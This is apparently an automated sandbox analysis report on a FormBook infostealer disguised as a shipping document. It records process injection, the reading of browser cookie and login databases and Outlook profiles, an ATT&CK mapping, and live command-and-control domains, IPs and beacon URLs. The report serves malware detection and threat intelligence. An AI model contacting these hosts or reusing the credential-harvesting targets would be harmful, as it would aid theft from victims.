                Source: Yara match | File source: 00000001.00000002.2221951172.0000000005600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.3520903347.0000000003560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000001.00000002.2221199653.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.3520852127.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\tzutil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\tzutil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\tzutil.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\tzutil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\tzutil.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\tzutil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\tzutil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\tzutil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\tzutil.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
                Source: DRAFT COPY BL, CI & PL.exe | Binary or memory string: WIN_81
                Source: DRAFT COPY BL, CI & PL.exe | Binary or memory string: WIN_XP
                Source: DRAFT COPY BL, CI & PL.exe | Binary or memory string: WIN_XPe
                Source: DRAFT COPY BL, CI & PL.exe | Binary or memory string: WIN_VISTA
                Source: DRAFT COPY BL, CI & PL.exe | Binary or memory string: WIN_7
                Source: DRAFT COPY BL, CI & PL.exe | Binary or memory string: WIN_8
                Source: DRAFT COPY BL, CI & PL.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                Remote Access Functionality

                Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000006.00000002.3520159967.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.3520891709.0000000001320000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.3521394310.00000000042D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000001.00000002.2221510574.0000000003B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000001.00000002.2221951172.0000000005600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.3520903347.0000000003560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000001.00000002.2221199653.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.3520852127.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Code function: 0_2_009A6283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Code function: 0_2_009A6747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket
                Mitre Att&ck Matrix (one list per tactic; the number in front of a technique is the count shown in the report)

                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
                Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
                Initial Access: 2 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
                Execution: 2 Native API; 2 Command and Scripting Interpreter; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
                Persistence: 1 DLL Side-Loading; 2 Valid Accounts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; 2 Valid Accounts; 21 Access Token Manipulation; 312 Process Injection; Startup Items; Scheduled Task/Job; At
                Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 3 Obfuscated Files or Information; 1 DLL Side-Loading; 2 Valid Accounts; 2 Virtualization/Sandbox Evasion; 21 Access Token Manipulation; 312 Process Injection
                Credential Access: 1 OS Credential Dumping; 21 Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
                Discovery: 2 System Time Discovery; 1 Account Discovery; 2 File and Directory Discovery; 116 System Information Discovery; 151 Security Software Discovery; 2 Virtualization/Sandbox Evasion; 3 Process Discovery; 1 Application Window Discovery; 1 System Owner/User Discovery
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
                Collection: 1 Archive Collected Data; 1 Data from Local System; 1 Email Collection; 21 Input Capture; 3 Clipboard Data; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
                Command and Control: 5 Ingress Tool Transfer; 1 Encrypted Channel; 5 Non-Application Layer Protocol; 5 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
                Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
                Behavior Graph (ID: 1571295). Sample: DRAFT COPY BL, CI & PL.exe. Start date: 09/12/2024. Architecture: WINDOWS. Score: 100.
                Top-level network contacts: www.prestigerugz.info; www.ontherise.top; 12 other IPs or domains.
                Top-level signatures: Suricata IDS alerts for network traffic; Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; 5 other signatures.
                Process chain:
                DRAFT COPY BL, CI & PL.exe started. Signatures: Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process.
                -> svchost.exe started. Signatures: Maps a DLL or memory area into another process.
                -> oFlOzErifOVgUf.exe injected. Network: taxitayninh365.site (103.75.185.22, ports 49997, 50006, 50012; VNBOOKING-AS-VNVietNamBookingcorporationVN, Viet Nam); www.prestigerugz.info (217.160.0.113, ports 49797, 49804, 49811; ONEANDONE-ASBrauerstrasse48DE, Germany); 5 other IPs or domains. Signatures: Found direct / indirect Syscall (likely to bypass EDR).
                -> tzutil.exe started. Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 2 other signatures.
                -> firefox.exe started.

Source | Detection | Scanner | Label
DRAFT COPY BL, CI & PL.exe | 45% | ReversingLabs | Win32.Trojan.AutoitInject
DRAFT COPY BL, CI & PL.exe | 100% | Joe Sandbox ML |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
http://www.44ynh.top/l9wb/ | 100% | Avira URL Cloud | malware
http://www.litespeedtech.com/error-page | 0% | Avira URL Cloud | safe
http://www.ontherise.top | 0% | Avira URL Cloud | safe
http://www.75178.club/q34f/ | 0% | Avira URL Cloud | safe
http://www.prestigerugz.info/m5si/ | 0% | Avira URL Cloud | safe
http://www.supernutra01.online/q3v1/?_PMl3=z6VH1Hp8JH&X25tIdT0=fC5DX2ZaB+U22tqbLO3TDxU7YJzfDko0GDmIeZjVqXUIxO0lfLVpCEprOw8FFlXlAKcfYmOgw3KJO3baxmfc0E1tB/T88Ahd3/Is7XNEE2gmn05mRDUrFrs= | 0% | Avira URL Cloud | safe
http://www.jijievo.site/521z/?X25tIdT0=Yx3A360WU89Z0GGJ4sj1ssKBmwUq+j2s/KQE4E7BbN1HAmIot3HipiLJPY42zmsSwDZ5HnrJyLyqyKfyPPN/Ul94K97G9BNerQ7FJbOxJndggPtqh59eHiM=&_PMl3=z6VH1Hp8JH | 0% | Avira URL Cloud | safe
http://www.ontherise.top/wr6c/ | 0% | Avira URL Cloud | safe
http://www.75178.club/q34f/?X25tIdT0=dUs1zx3MtgRbplDX2ZUJYQ2PdhhIhHuhj9/PkAdaJlwoIMpaDvWmQ8f5x9wKpmWIn5GTBIDw1kY0kdraeZ9e5WN4Bfp+jFvkFPdElOhqE98bTiQ+FUKDG58=&_PMl3=z6VH1Hp8JH | 0% | Avira URL Cloud | safe
http://www.44ynh.top/l9wb/?X25tIdT0=dKoVDaTSZmwFjIfnPMekOmNSbaoqabF1rLRKWxbZMRgsIAaeZOJ62iUdSY3DsOWKNrgOWvNnZKtmZJtN7rtvj9a+jKl6nL3gw5l63A2ReISiUGJmdOx1Ym0=&_PMl3=z6VH1Hp8JH | 100% | Avira URL Cloud | malware
http://www.prestigerugz.info/m5si/?X25tIdT0=eqY3hh7t27bJ5LQfUACiIBop+4++C12UJ8jqVv8fYDW4JFKoOjNM9tGFtSdYH3IXt9v4kCCdG8KeR7OcjMcnk3D3+1Po89+p2utRtVEn8mZesTWlz/QNOcc=&_PMl3=z6VH1Hp8JH | 0% | Avira URL Cloud | safe
http://www.taxitayninh365.site/syud/ | 0% | Avira URL Cloud | safe
http://www.jijievo.site/521z/ | 0% | Avira URL Cloud | safe
http://www.taxitayninh365.site/syud/?X25tIdT0=gwko4eFZldhJcfMqOkuan3QkmOfQdTdfj6+zOL8mAR+JwCfgYxN4oPNpnnwcuB8vQ1y33dVzUTzhe1i/ZlYVLB7aoFOkRW7okE41Q20TXo8AOTZtTl9M9bg=&_PMl3=z6VH1Hp8JH | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
44ynh.top | 38.181.21.178 | true | true | | unknown
all.wjscdn.com | 154.90.58.209 | true | true | | unknown
www.prestigerugz.info | 217.160.0.113 | true | true | | unknown
www.supernutra01.online | 172.67.220.36 | true | false | | high
taxitayninh365.site | 103.75.185.22 | true | true | | unknown
www.ontherise.top | 162.0.213.94 | true | true | | unknown
gtml.huksa.huhusddfnsuegcdn.com | 23.167.152.41 | true | false | | high
www.75178.club | unknown | unknown | false | | unknown
www.setwayidiomas.online | unknown | unknown | false | | unknown
www.jijievo.site | unknown | unknown | false | | unknown
www.buckser.info | unknown | unknown | false | | unknown
www.44ynh.top | unknown | unknown | false | | unknown
www.taxitayninh365.site | unknown | unknown | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.supernutra01.online/q3v1/?_PMl3=z6VH1Hp8JH&X25tIdT0=fC5DX2ZaB+U22tqbLO3TDxU7YJzfDko0GDmIeZjVqXUIxO0lfLVpCEprOw8FFlXlAKcfYmOgw3KJO3baxmfc0E1tB/T88Ahd3/Is7XNEE2gmn05mRDUrFrs= | false | Avira URL Cloud: safe | unknown
http://www.prestigerugz.info/m5si/ | true | Avira URL Cloud: safe | unknown
http://www.44ynh.top/l9wb/ | true | Avira URL Cloud: malware | unknown
http://www.75178.club/q34f/ | true | Avira URL Cloud: safe | unknown
http://www.jijievo.site/521z/?X25tIdT0=Yx3A360WU89Z0GGJ4sj1ssKBmwUq+j2s/KQE4E7BbN1HAmIot3HipiLJPY42zmsSwDZ5HnrJyLyqyKfyPPN/Ul94K97G9BNerQ7FJbOxJndggPtqh59eHiM=&_PMl3=z6VH1Hp8JH | true | Avira URL Cloud: safe | unknown
http://www.44ynh.top/l9wb/?X25tIdT0=dKoVDaTSZmwFjIfnPMekOmNSbaoqabF1rLRKWxbZMRgsIAaeZOJ62iUdSY3DsOWKNrgOWvNnZKtmZJtN7rtvj9a+jKl6nL3gw5l63A2ReISiUGJmdOx1Ym0=&_PMl3=z6VH1Hp8JH | true | Avira URL Cloud: malware | unknown
http://www.75178.club/q34f/?X25tIdT0=dUs1zx3MtgRbplDX2ZUJYQ2PdhhIhHuhj9/PkAdaJlwoIMpaDvWmQ8f5x9wKpmWIn5GTBIDw1kY0kdraeZ9e5WN4Bfp+jFvkFPdElOhqE98bTiQ+FUKDG58=&_PMl3=z6VH1Hp8JH | true | Avira URL Cloud: safe | unknown
http://www.ontherise.top/wr6c/ | true | Avira URL Cloud: safe | unknown
http://www.prestigerugz.info/m5si/?X25tIdT0=eqY3hh7t27bJ5LQfUACiIBop+4++C12UJ8jqVv8fYDW4JFKoOjNM9tGFtSdYH3IXt9v4kCCdG8KeR7OcjMcnk3D3+1Po89+p2utRtVEn8mZesTWlz/QNOcc=&_PMl3=z6VH1Hp8JH | true | Avira URL Cloud: safe | unknown
http://www.jijievo.site/521z/ | true | Avira URL Cloud: safe | unknown
http://www.taxitayninh365.site/syud/ | true | Avira URL Cloud: safe | unknown
http://www.taxitayninh365.site/syud/?X25tIdT0=gwko4eFZldhJcfMqOkuan3QkmOfQdTdfj6+zOL8mAR+JwCfgYxN4oPNpnnwcuB8vQ1y33dVzUTzhe1i/ZlYVLB7aoFOkRW7okE41Q20TXo8AOTZtTl9M9bg=&_PMl3=z6VH1Hp8JH | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://ac.ecosia.org/autocomplete?q= | tzutil.exe, 00000006.00000003.2409972821.000000000834D000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/chrome_newtab | tzutil.exe, 00000006.00000003.2409972821.000000000834D000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | tzutil.exe, 00000006.00000003.2409972821.000000000834D000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | tzutil.exe, 00000006.00000003.2409972821.000000000834D000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://kb.fastpanel.direct/troubleshoot/ | oFlOzErifOVgUf.exe, 00000005.00000002.3522703492.0000000004B94000.00000004.80000000.00040000.00000000.sdmp, tzutil.exe, 00000006.00000002.3522886189.0000000006900000.00000004.00000800.00020000.00000000.sdmp, tzutil.exe, 00000006.00000002.3521520446.0000000004344000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2517818127.000000003C874000.00000004.80000000.00040000.00000000.sdmp | false | | high
http://www.litespeedtech.com/error-page | oFlOzErifOVgUf.exe, 00000005.00000002.3522703492.0000000005692000.00000004.80000000.00040000.00000000.sdmp, tzutil.exe, 00000006.00000002.3521520446.0000000004E42000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | tzutil.exe, 00000006.00000003.2409972821.000000000834D000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | tzutil.exe, 00000006.00000003.2409972821.000000000834D000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.ontherise.top | oFlOzErifOVgUf.exe, 00000005.00000002.3520891709.0000000001374000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | tzutil.exe, 00000006.00000003.2409972821.000000000834D000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.ecosia.org/newtab/ | tzutil.exe, 00000006.00000003.2409972821.000000000834D000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | tzutil.exe, 00000006.00000003.2409972821.000000000834D000.00000004.00000020.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
162.0.213.94 | www.ontherise.top | Canada | 35893 | ACPCA | true
217.160.0.113 | www.prestigerugz.info | Germany | 8560 | ONEANDONE-ASBrauerstrasse48DE | true
23.167.152.41 | gtml.huksa.huhusddfnsuegcdn.com | Reserved | 395774 | ESVC-ASNUS | false
103.75.185.22 | taxitayninh365.site | Viet Nam | 63762 | VNBOOKING-AS-VNVietNamBookingcorporationVN | true
172.67.220.36 | www.supernutra01.online | United States | 13335 | CLOUDFLARENETUS | false
154.90.58.209 | all.wjscdn.com | Seychelles | 40065 | CNSERVERSUS | true
38.181.21.178 | 44ynh.top | United States | 174 | COGENT-174US | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1571295
Start date and time: 2024-12-09 09:08:45 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 31s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: DRAFT COPY BL, CI & PL.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/3@13/7
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 51
• Number of non-executed functions: 275
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: DRAFT COPY BL, CI & PL.exe
                                                              No simulations
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              162.0.213.94New Order.exeGet hashmaliciousFormBookBrowse
                                                              • www.inspireto.life/odi0/
                                                              Price Inquiry.exeGet hashmaliciousFormBookBrowse
                                                              • www.oxilo.info/ve3g/
                                                              3qsTcL9MOT.exeGet hashmaliciousFormBookBrowse
                                                              • www.oxilo.info/ve3g/
                                                              PO #86637.exeGet hashmaliciousFormBookBrowse
                                                              • www.syvra.xyz/h2bb/
                                                              New Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                              • www.kryto.top/09dt/
                                                              invoice.exeGet hashmaliciousFormBookBrowse
                                                              • www.syvra.xyz/h2bb/
                                                              r9856_7.exeGet hashmaliciousFormBookBrowse
                                                              • www.zimra.xyz/knrh/
                                                              PO#86637.exeGet hashmaliciousFormBookBrowse
                                                              • www.syvra.xyz/h2bb/
                                                              New Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                              • www.kryto.top/09dt/?lt=rbfG5gS9WKSJFi6dUtliAmup1VBkpZqBcQUpaxDzzhML0bBwD+Qj3UGhdh/xQ289mI9ftdcjEJi/URIx5SNFZ5ISx4hWtAA8ETmF0fwXx3j+/89J/je5YeA=&3ry=nj20Xr
                                                              Scan 00093847.exeGet hashmaliciousFormBookBrowse
                                                              • www.kryto.top/09dt/
                                                              217.160.0.113Payment-251124.exeGet hashmaliciousFormBookBrowse
                                                              • www.prestigerugz.info/m5si/
                                                              r98100.TREN.AUTpdf.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                              • www.lessstressmoreprogress.net/mr04/?Z0D0=rvjNexh3zvI53VZUK60PjrTIX1CVATH5ZgWwVgY6EkaNyaLT3yhdToUFTRj6RAPXbKk9&Xv9xe4=R6Ax
                                                              Purchase_Order.exeGet hashmaliciousFormBookBrowse
                                                              • www.le-riche.fr/i65a/?l6APbZn0=+0bkTaWhYWAVxnCJ2nwVpM/U/2VALoigtFbvSxMYohoxF0aNNQstvpt3f/wi09R94V0cyMZY94rCxAyEavJUVbQqc8cScfvcKQ==&VVcXv=Fzud9r2H_Lzd_B
                                                              Updrag.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                              • www.le-riche.fr/niku/?7nFlllx=xrumqyiZw2NMGXSTF9hjIkLrOU6nhVxQiFFKzEKgJBV7+VOp5xdEyxF9LjnfDDCimwOB7aDhAwI/GQ5vlF1HZu55hCcgrcQOFQ==&u4=UvZXQxCPphTT6J
                                                              Vldigst.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                              • www.le-riche.fr/niku/?mPwH=_XpHEd8884gT7RZp&4hiT=xrumqyiZw2NMGXSTF9hjIkLrOU6nhVxQiFFKzEKgJBV7+VOp5xdEyxF9LjnfDDCimwOB7aDhAwI/GQ5vlF1HZu55hCcgrcQOFQ==
                                                              t.exeGet hashmaliciousFormBookBrowse
                                                              • www.le-riche.fr/niku/?xH=WHAh6h1XT&NPUh=xrumqyiZw2NMGXSTXZhmP1v4YE2H3hdQiFFKzEKgJBV7+VOp5xdEyw59LjnfDDCimwOB7aDhAwI/GQ5vlF18Zvll9TNcqcdgEQ==
                                                              23.167.152.41A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                              • www.75178.club/a4h7/
                                                              Payment-251124.exeGet hashmaliciousFormBookBrowse
                                                              • www.75178.club/q34f/
                                                              A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                              • www.75178.club/a4h7/
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              www.supernutra01.onlinePO_1111101161.vbsGet hashmaliciousFormBookBrowse
                                                              • 104.21.24.198
                                                              PAYMENT_ADVICE.exeGet hashmaliciousFormBookBrowse
                                                              • 104.21.24.198
                                                              Payment-251124.exeGet hashmaliciousFormBookBrowse
                                                              • 104.21.24.198
                                                              DO-COSU6387686280.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                              • 104.21.24.198
                                                              CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                              • 172.67.220.36
                                                              CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                              • 172.67.220.36
                                                              Project Breakdown Doc.exeGet hashmaliciousFormBookBrowse
                                                              • 172.67.220.36
                                                              DOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                              • 172.67.220.36
                                                              gtml.huksa.huhusddfnsuegcdn.comlgkWBwqY15.exeGet hashmaliciousFormBookBrowse
                                                              • 23.167.152.41
                                                              New quotation request.exeGet hashmaliciousFormBookBrowse
                                                              • 23.167.152.41
                                                              Invoice 10493.exeGet hashmaliciousFormBookBrowse
                                                              • 23.167.152.41
                                                              HUEtVS3MQe.exeGet hashmaliciousFormBookBrowse
                                                              • 23.167.152.41
                                                              A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                              • 23.167.152.41
                                                              Payment-251124.exeGet hashmaliciousFormBookBrowse
                                                              • 23.167.152.41
                                                              A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                              • 23.167.152.41
                                                              need quotations.exeGet hashmaliciousFormBookBrowse
                                                              • 23.167.152.41
                                                              rGO880-PDF.exeGet hashmaliciousFormBookBrowse
                                                              • 206.119.185.138
                                                              Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                              • 206.119.185.141
                                                              www.prestigerugz.infoPayment-251124.exeGet hashmaliciousFormBookBrowse
                                                              • 217.160.0.113
                                                              all.wjscdn.comNew Order.exeGet hashmaliciousFormBookBrowse
                                                              • 154.90.35.240
                                                              TNT Express Delivery Consignment AWD 87993766479.vbsGet hashmaliciousFormBookBrowse
                                                              • 38.54.112.227
                                                              Payment-251124.exeGet hashmaliciousFormBookBrowse
                                                              • 154.205.159.116
                                                              CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                              • 38.54.112.227
                                                              CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                              • 154.90.58.209
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              ONEANDONE-ASBrauerstrasse48DENEW.RFQ00876.pdf.exeGet hashmaliciousFormBookBrowse
                                                              • 217.160.0.200
                                                              atthings.docGet hashmaliciousRemcosBrowse
                                                              • 87.106.161.219
                                                              mpsl.elfGet hashmaliciousUnknownBrowse
                                                              • 217.160.35.205
                                                              purchase order.exeGet hashmaliciousFormBookBrowse
                                                              • 74.208.236.156
                                                              MGQeZjDXc3.exeGet hashmaliciousFormBookBrowse
                                                              • 217.160.0.207
                                                              s7Okni1gfE.exeGet hashmaliciousFormBookBrowse
                                                              • 217.160.0.207
                                                              sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                              • 74.208.53.196
                                                              FR65 380 071 464.docxGet hashmaliciousUnknownBrowse
                                                              • 217.160.114.212
                                                              FR65 380 071 464.docxGet hashmaliciousUnknownBrowse
                                                              • 217.160.114.212
                                                              togiveme.docGet hashmaliciousRemcosBrowse
                                                              • 217.160.114.212
Match | Sample / URL | Detection | Threat | Context
VNBOOKING-AS-VNVietNamBookingcorporationVN | quotation.exe | malicious | FormBook | 103.75.185.22
 | specifications.exe | malicious | FormBook, PureLog Stealer | 103.75.185.22
 | ARRIVAL NOTICE.exe | malicious | FormBook, PureLog Stealer | 103.75.185.22
 | DHL SHIPPING CONFIRMATION-SAMPLES DELIVERY ADDRESS.exe | malicious | FormBook | 103.75.187.24
 | SecuriteInfo.com.Trojan.DownLoader47.2167.1345.13365.exe | malicious | Unknown | 103.75.184.19
 | SecuriteInfo.com.Trojan.DownLoader47.2167.1345.13365.exe | malicious | Unknown | 103.75.184.19
 | https://bloxe.vn/za.html | malicious | Unknown | 103.75.187.17
 | Cari_Hesap_Ekstresi_100923.exe | malicious | FormBook, NSISDropper | 103.75.184.21
 | Sipari#U015f_5035.exe | malicious | FormBook, NSISDropper | 103.75.184.21
 | https://thienquy.vn/app-personal-mobile/mua/USER/scis/j6UnVHZsitlYrxStPNFUN4TsSjgEJkN7dlDp6FXSjFxO/3D/no-back-button/ | malicious | Unknown | 103.75.184.25
 | ACPCAMN1qo2qaJmEvXDP.exe | malicious | FormBook | 162.0.215.33
 | jew.mips.elf | malicious | Unknown | 162.52.78.93
 | home.ppc.elf | malicious | Mirai | 162.54.91.8
 | i686.elf | malicious | Unknown | 162.54.34.238
 | main_mpsl.elf | malicious | Mirai | 162.65.245.139
 | sora.sh4.elf | malicious | Mirai | 162.55.63.205
 | teste.x86_64.elf | malicious | Gafgyt, Mirai, Moobot, Okiru | 162.128.62.120
 | m68k.elf | malicious | Mirai | 162.137.25.111
 | teste.arm.elf | malicious | Gafgyt, Mirai, Moobot, Okiru | 162.32.169.38
 | New Order.exe | malicious | FormBook | 162.0.213.94
ESVC-ASNUS | lgkWBwqY15.exe | malicious | FormBook | 23.167.152.41
 | New quotation request.exe | malicious | FormBook | 23.167.152.41
 | A2028041200SD.exe | malicious | FormBook | 23.167.152.41
 | Payment-251124.exe | malicious | FormBook | 23.167.152.41
 | A2028041200SD.exe | malicious | FormBook | 23.167.152.41
 | need quotations.exe | malicious | FormBook | 23.167.152.41
 | FSd2UlLC6H.elf | malicious | Unknown | 23.167.178.53
 | 1YhXFyiSni.dll | malicious | Wannacry | 23.167.182.84
                                                              No context
                                                              No context
                                                              Process:C:\Windows\SysWOW64\tzutil.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                              Category:dropped
                                                              Size (bytes):114688
                                                              Entropy (8bit):0.9746603542602881
                                                              Encrypted:false
                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                              Malicious:false
                                                              Reputation:high, very likely benign file
